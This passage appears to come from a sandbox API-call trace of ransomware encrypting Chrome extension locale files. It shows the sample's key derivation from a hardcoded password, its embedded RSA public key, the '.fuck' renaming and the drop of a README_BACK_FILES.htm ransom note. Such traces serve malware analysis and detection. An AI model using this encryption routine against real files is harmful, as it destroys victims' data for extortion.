KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.409] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.409] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c4f0) returned 1 [0248.410] CryptImportPublicKeyInfo (in: hCryptProv=0x293c4f0, dwCertEncodingType=0x1, pInfo=0x2930090*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29300c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29300c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29372f8) returned 1 [0248.410] CryptEncrypt (in: hKey=0x29372f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.410] CryptEncrypt (in: hKey=0x29372f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c358*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c358*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.410] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c358*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c358*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.411] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0248.412] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0248.412] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0248.412] CloseHandle (hObject=0x5d5c) returned 1 [0248.412] CloseHandle (hObject=0x5d58) returned 1 [0248.413] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0248.415] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0248.416] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0248.417] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0248.418] CryptDestroyHash (hHash=0x2938af8) returned 1 [0248.418] CryptDestroyKey (hKey=0x2938978) returned 1 [0248.418] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.418] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.418] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.418] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0248.418] AreFileApisANSI () returned 1 [0248.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.418] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.419] GetFileType (hFile=0x5d50) returned 0x1 [0248.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.420] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.420] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.421] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.421] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.421] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.421] GetLastError () returned 0x0 [0248.421] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json")) returned 0x20 [0248.421] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0248.421] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.422] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.422] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.422] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.424] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.424] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.424] CryptHashData (hHash=0x2938978, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.424] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.424] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.424] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.424] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293c930) returned 1 [0248.425] CryptImportPublicKeyInfo (in: hCryptProv=0x293c930, dwCertEncodingType=0x1, pInfo=0x2931270*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29312a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29312a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937338) returned 1 [0248.425] CryptEncrypt (in: hKey=0x2937338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.425] CryptEncrypt (in: hKey=0x2937338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c688*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c688*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293c688*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c688*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.426] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe3, lpOverlapped=0x0) returned 1 [0248.427] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.427] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.427] CloseHandle (hObject=0x5d58) returned 1 [0248.427] CloseHandle (hObject=0x5d5c) returned 1 [0248.427] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0248.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0248.430] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0248.431] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0248.432] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.432] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.432] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.432] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.432] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.432] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0248.432] AreFileApisANSI () returned 1 [0248.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.432] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.433] GetFileType (hFile=0x5d50) returned 0x1 [0248.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.434] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.434] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29389f8 [0248.434] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.434] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.434] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.434] GetLastError () returned 0x0 [0248.435] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json")) returned 0x20 [0248.435] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0248.435] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.436] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.437] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.437] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.439] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.439] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.439] CryptHashData (hHash=0x2938af8, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.439] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29387f8) returned 1 [0248.439] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.439] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.439] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cb50) returned 1 [0248.440] CryptImportPublicKeyInfo (in: hCryptProv=0x293cb50, dwCertEncodingType=0x1, pInfo=0x29314e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931510*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931518*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936b78) returned 1 [0248.440] CryptEncrypt (in: hKey=0x2936b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.440] CryptEncrypt (in: hKey=0x2936b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c9b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c9b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.440] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c9b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.441] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdf, lpOverlapped=0x0) returned 1 [0248.442] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.442] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.442] CloseHandle (hObject=0x5d5c) returned 1 [0248.442] CloseHandle (hObject=0x5d58) returned 1 [0248.442] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0248.447] SetFileAttributesA 